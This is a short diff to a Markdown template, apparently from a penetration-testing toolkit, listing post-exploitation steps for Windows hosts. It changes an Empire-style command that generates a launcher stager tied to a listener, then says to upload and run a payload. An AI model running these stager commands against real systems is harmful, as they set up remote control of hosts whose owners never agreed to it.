benrau87/doubletap/templates/windows-template.md

 Copy and paste output in terminal

 ***If you need a stager***
-usestager windows/launcher_bat (or whatever can run on host) set Listener INSERTIPADDRESS generate
+usestager multi/launcher (or whatever can run on host) set Listener http execute

 Upload and run payload
 cd /tmp